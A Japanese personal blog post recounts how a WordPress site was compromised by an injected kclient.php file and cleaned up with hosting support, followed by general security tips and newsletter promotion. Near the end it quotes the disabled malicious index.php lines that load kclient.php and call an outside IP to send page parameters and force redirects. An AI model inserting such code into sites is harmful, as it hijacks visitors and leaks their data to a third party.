ワードプレストラブル

403エラーの原因はkclient.php!対処に成功した経過お見せします!!

メルマガ読者さん
メルマガ読者さん
あれ、つぼこさんのブログ、エラー出てますよ

Zoomでメルマガ読者さんとやり取りしている中、ブログにエラーが起きていることが発覚。一気に血の気が引いて青ざめたつぼこ(@tsuboko_info)です、こんにちは!

去年の夏にも403エラーで悩まされた私ですが(詳細はこちら⇒不正アクセスでWordPressがいきなり403Forbiddenに!解決に至るまでの道のり)、またしても403エラーにやられてしまいました。

前回とは違ったタイプでしたが、結論からいうとおそらくですが「長期間更新されていないプラグインが原因」だったようです。そこの脆弱な部分からアクセスされ、改ざんに至りました。

もうどうしよう!2回目だしもう終わりだ!!

そんな風にも思ったのですが、2度あることは3度ある、というからなんとか自分でできないか思考錯誤しました。そしていろいろな方のサポートによって無事対処でき解決!

調べてみると、同じように悩んでいる方や実際に表示されて諦めてそのままにされている方がたくさんいました。私のこの経験が、同じように悩んでいる方の力に少しでもなれたら嬉しいです。

[REQ_ERR:403] [KTrafficClient]何かがおかしい。デバッグモードを有効にして理由を確認してください。

403error-kclientエラー

今回私の画面に出てきたのは↓のエラーメッセージ。

[REQ_ERR:403] [KTrafficClient]何かがおかしい。デバッグモードを有効にして、理由を確認してください。

訳してみると

[REQ_ERR:403] [KTrafficClient]何かがおかしい。デバッグモードを有効にして、理由を確認してください。

という内容に。デバックモードっていうのが私にはよくわからないんですが、何か無効になっている、というのはわかります。

以前も403エラーになった私ですが、そのときはブログにアクセスすることすらできませんでした。今回明らかに違うのがこちら。

  • ブログにアクセスできる
  • プラグインやテーマなど怪しいところを確認できる
  • エラーメッセージはブログの上部に表示されるだけ
  • 記事更新、編集などブログ内は自由にできる

前回こちらの記事「不正アクセスでWordPressがいきなり403Forbiddenに!解決に至るまでの道のり」で書いたように、ブログへアクセスすることができず、お手上げ状態でした。

でも、今回は自分でもなんとかできるかも?!いや、何とかしたい!!という思いもあって、どうしたらいいか試行錯誤しました。

原因は不正確アクセスによる怪しいファイルとコードだった!

今回も自分一人では手に負えず、そこで助けてくださったのがコンテンツ販売のプロであり、ブログで稼ぎたい人におすすめのディスカバリーアカデミーという教材販売者である小澤竜太(@discoveryozawa)さん。小澤さんは私にはない知識がいっぱい詰まっている元プログラマーですから(元なんていったら失礼かな!?)、いろんな情報をかき集めてくれました!

そこでまずはじめに参考にしたのが来客メディアの専門家の佐藤さんのブログ↓

https://up-blog.com/wordpress-malware/

デバックモードとかわからないまま、佐藤さんのブログを参考にできることからスタート。

プラグインやテーマなどいろいろ見直したことはあるんですが、FileZilla(ファイルジラ)を使って調べてみてわかったことが「kclient.php」という何やら怪しいファイルがあったこと。

403error-kclient同じerror

佐藤さんのブログと同じファイルが出てきて

つぼこ
つぼこ
え、なんで私が・・・

とほんと凹みました・・・。でも、へこんでられないし、とにかく大事になる前に何とかしなくちゃ!という思いで他のファイルも調べました。

が、他に怪しいファイルは見当たらなかったので

つぼこ
つぼこ
もしかして、この1つだけ処理しちゃえば解決する?

ってちょっとうきうき気分で削除!

削除したらしたで「致命的なエラー」という、それまた怖いエラーメッセージが出てきまして。

ガーン・・・。

デスクトップにコピーした怪しいファイルを残念ながらサーバーに戻して、また画面に「[REQ_ERR: 403] [KTrafficClient] Something is wrong. Enable debug mode to see the reason.」が残るまま、しばらくこのメッセージとお付き合することが決まりました(泣)。

※FileZilla(ファイルジラ)については近々で記事作成します!

原因はプラグイン?テーマ??サーバーか???確認してみたこと

次に、プラグインやテーマについて確認することに。

  • プラグインをすべて無効化し、1つ1つ有効化にしてエラーメッセージが改善されるかみた→改善なし
  • テーマをTwenty Twentyに戻す→改善なし
  • 古く更新されていないプラグインが1つあり削除→改善なし
  •  Wordfence Securityをインストールし有効化、スキャン上以上なし→改善なし

結果、テーマを入れ直したので崩れてしまったんですが、テーマによる異常でもないということ、プラグインにも問題ない?ということもわかりました。

Wordfence Securityとはセキュリティ対策のプラグイン

セキュリティ対策のプラグインっていれていますか?私も初めは躊躇したんですが、躊躇するより何かトラブルが起きることの方が怖いので、今はきちんと入れています。

いくらセキュリティ対策とはいえ、見慣れないプラグインだとインストールするのって結構怖いですよね。

テーマと相性が合わなかったり、プラグイン同士てケンカしちゃったり。

私も他のセキュリティ対策用のプラグインを使っていたのですが、小澤さんに勧められたこともあって、改めてWordfence Securityというプラグインを導入しました。

このプラグインを使ってブログ内を隅々スキャンしてみたんですが、これに引っかかる項目はなし。原因は解明されず、次の手を考えることになりました。

ちなみに・・・

このプラグインはネット上で不正アクセス関係で調べると、必ずと言っていいほどおすすめに上がるプラグインなんです!

400万件以上インストールされ使われているので、もしセキュリティ関係のプラグインをまだインストールしていなければ導入しておいてもいいですね。

他に何かセキュリティ対策用のプラグインを使っていたら、相性が合うかどうか確認してみてから使ってください。

エックスサーバーに問い合わせ、無事解決!!

最初に紹介した佐藤さんのブログでは

「長期間更新されていなかったプラグイン」が原因になっていた

そうなので、私も更新されていないプラグインが原因だったのかな、という結論に至りました。

しかし、小澤さんによると「サーバー側にも問題があるかもしれない」ということで、サーバー側にも今回の流れを時系列でお伝えし、対応してもらったところ、なんと!!

無事解決に至ることができました!!!

ばんざーい!!!!!!!!!

一気に解決できたような展開ですっごい驚いたんですが、何が問題だったのかご紹介しますね。

エックスサーバーとのやり取りは20回以上!

エックスサーバーの方とのやり取りは全部で30回近くに渡りました。この流れがスムーズにいくように、事前に知っておいた方がいいこともあるので記載します。

エックスサーバーのお問い合わせで必要になる情報

エックスサーバーに問い合わせる際必要となるのが↓

  • XserverアカウントID
  • サーバID
  • ドメイン名
  • お問い合わせ番号(お問い合わせ番号があれば)

が必要になります。記載があるとサポートスタッフさんの手間も省けるし、連絡のやり取りはスムーズになります。

お問い合わせ内容によっては必要となる情報も変わってきますが、今回はこの4つを使ってやり取りをしました。

①エラーの前後を時系列で伝える

エラー発生には必ず何かしらの原因があります。主にテーマやプラグインの更新や不正アクセスなどが考えられるため、確認しましょう。

私は特にテーマ、プラグインの更新は関係なかったので、不正アクセス?やウイルス的なものを故意に忍び込ませられたことが予測されました。

エラーの前後でどういった変化があったのかをまとめ、ありのままをお伝えしました。

②エラー発覚後、自分でやったこと

時系列に加えエラー発覚後、自分がどういったことをしたのか時系列でお伝えしました。

私がやったことははじめの方でもお伝えした通り、

プラグインをすべて無効化

プラグインを1つ1つ有効/無効にし確認

テーマをデフォルトにする

不正ファイルの削除

Wordfence Securityでブログ内をスキャン

の5つ。これを伝えました。

③エックスサーバー側からの解答

最低限確認していたせいか、

再度、プラグインの無効化の確認、テーマのデフォルトにすることをアドバイスされました。

しかし、それでも解決しなかったので次にもらったアドバイスは

ファイルマネージャーを利用してサーバーへアクセスし、

「powerful-mama.com/public_html/」フォルダ直下の

「index.php」を編集して、下記の行を削除してください

require_once dirname(__FILE__) . ‘/kclient.php’;

というお知らせでした。そこで早速ファイルマネージャーから自分のドメインを選択。

index.phpを選択して、上にある編集ボタンをクリック。

コードが出てくるので、そこから該当する「 require_once dirname(__FILE__) . ‘/kclient.php’;」を見つけて削除しました。

しかし、削除したのにも関わらず「致命的なエラー」というメッセージは出るし、ブログにもアクセスできなくなるしで、再度問い合わせました。

そこで返ってきた解答がこちら↓

また、先にご案内した削除では不十分でしたので、サポートにて
「index.php」の関連する行のコメントアウト(無効化)を対応いたしました。

閲覧が可能になっているかと存じますので、ご確認くださいますでしょうか。

プラグインやテーマも再適用いただければと存じます。

▼サポートにてコメントアウトした行(抜粋)
─────────────────────────────────────
// $client = new KClient(‘http://195.245.112.7/api.php?‘, ‘qWZkdV6LmfBwvhwv’);
// $client->sendAllParams(); // to send all params from page query
// $client->forceRedirectOffer(); // redirect to offer if an offer is chosen

// $client->executeAndBreak(); // to stop page execution if there is redirect or some output
─────────────────────────────────────

また何かご不明な点がございましたら、お気軽にお問い合わせください。

え?!

何???閲覧が可能になっている????

というので、ブログを見たらエラーメッセージも消えて、ブログが閲覧できるようになっていました!

不正アクセスかなんかで変なものを忍び込まされていたんですね。

あぁ恐ろしや!

エックスサーバーは24時間365日対応!しかも丁寧!!

私が利用しているのはエックスサーバーなんですが、前回の不正アクセスのときも丁寧な対応だったので好印象なんです。

しかも24時間、365日対応だからありがたい!

一応、電話対応もしてくれるんですけど、電話で問い合わせてみたら

エックスサーバーさん
エックスサーバーさん
契約関係のこと(代金とか何をどういう契約かとかそういったこと)についてはお調べできますが、サーバー内のことに関してはできません

とバシッ!と断られました(笑)。

契約上以外のトラブルに関しては、メールで気長に待つしかないですね。

とは言っても24時間365日対応なので、基本的に連絡は早いです!私はほぼ1日でやり取り終えましたし。

事前に連絡がスムーズにできるよう、

  • XserverアカウントID
  • サーバID
  • ドメイン名
  • お問い合わせ番号(お問い合わせ番号があれば)

のうちの必要となる項目はきちんとお問い合わせメールに記載してくださいね。

また、なにか異常があったとき、添付画像を付けて伝えたくなりますが、エックスサーバーさんの都合上、添付画像は見られないそうです。

なので、どんな状況なのか、画面に出ているエラーメッセージなどは1字1句間違えずに、伝えてくださいね。

私が使っているレンタルサーバーはこちら⇒https://business.xserver.ne.jp/

不正アクセスから身を守る4つの方法

不正アクセスでWordPressがいきなり403Forbiddenに!解決に至るまでの道のりの記事にも書いたことプラス、

  1. セキュリティ対策
  2. テーマやプラグインのこまめな更新(最新状態にする)
  3. 長期間更新のないプラグインの削除(代わりになるプラグインに変更)
  4. バックアップ

はきちんとやっておきましょう!

不正アクセスされないようにセキュリティ対策は常に万全にして、テーマやプラグインのバージョンも最新に。いざとなったときに復元できるよう日々のバックアップ。

普段から使っているプラグインでも、調べ直してみると長期間更新されずに止まっているものもあります。

定期的に見直す!止まっていたら削除!!

代わりに使えるプラグインがあればそちらに変更!!!

自分の身は自分で守るようにするのも、大切です。

まとめ:自分でも確認できることが増えた!

サーバーのファイル管理にアクセスするなんて、以前の私だったら怖くてできませんでした。

でも、やらざるを得ない機会が増えると(他の人より頻度高いかも)、なんとなーくですけどどこを確認するべきものなのか少しずつ覚えてきました。

全て誰かにお願いしてもいいのですが、私の場合は少しでもワードプレスのことを知って仲良くなれたら・・・そんな思いがあって、自分でやるようにしています。

教えてくれる人がいるのなら、教わりながらまずは自分でもやってみる。

しかしですね、時間というものは無限ではなく有限なので、そればかりに時間をとられて何もできないということになったら大変です。もしご自身でされるのなら、

どのくらいの時間なら自分は時間をかけていいのか

というのも考えて、取り組んでみてください。

ちなみに私は1日かかりました。1日で終わってよかった、というのが本音です。1日で終わらなかったらプロにお任せしてました。

ブログやネットのプロ、おすすめ3人!

普段からTwitterでもすぐに役立つ情報を提供している「ゆか(yu_ka2018)」さん。WordPress専門家として活躍するだけでなく、ブログやメルマガなど多岐にわたって活躍されているすごい方。

女性ならではの細やかな視点で教えてくれるので、何かあればすぐ相談させてもらっています。

今回のエラーでもいち早く連絡をくれて、本当に心強かったです。

また、前回の403エラーでお世話になったのが「勝てるブログサポーター がみたか
@gamitaka02)」さん。はじめのほうで紹介した佐藤さんのブログもがみたかさんにお願いしたと書いてありましたね。

今回のエラー問題が勃発したときもclubhouse内でも「がみたかさんいいよ!」とおすすめしてくれるほどの知名度でした。

そして3人目はコンテンツ販売のプロであり、ブログで稼ぎたい人におすすめのディスカバリーアカデミーという教材販売者の小澤竜太(@discoveryozawa)さん。

元SEで現在はディスカバリーアカデミーという教材を販売。たくさんのアフィリエイターや起業家さんを育て上げサポートし、マルチに活躍されている方です。

私もこの教材をご縁に小澤さんに出会え、今回のエラーの解決に導いていただくことができました。

今はSEとしては働いていないので、トラブルが起こったときに直接お願いすることはできない方ではありますが、教材購入したら特典で小澤さんの運営するコミュニティに参加して、今回の私のようにサポートしてもらえるかもしれません^^

ブログで稼ぎたいワーママ仲間募集中!

つぼこはワーママでありながら、ブログでも収入の柱をもつ副業ママです。

WordPressだけでなく、人生いろんなトラブルだらけですごしてきましたが、今はブログを楽しく運営して人生enjoyしています。

メルマガではブログで稼ぎたい、副業したい人向けに、私が経験して得た情報をつつみ隠さずお届けしています。

だだ漏れで申し訳ありませんが、一緒に稼ぐ仲間を増やしたいので、興味のある方は是非登録してください^^

[jin-button-shinyvisual = “shiny” hover = “down” radius = “50px” color1 = “#54dcef” color2 = “#0794E8” url = “https://powerful-mama.net/p/r/ XR3YGRkf “target =” _self “]つぼこの定メルマガ[/ jin-button-shiny]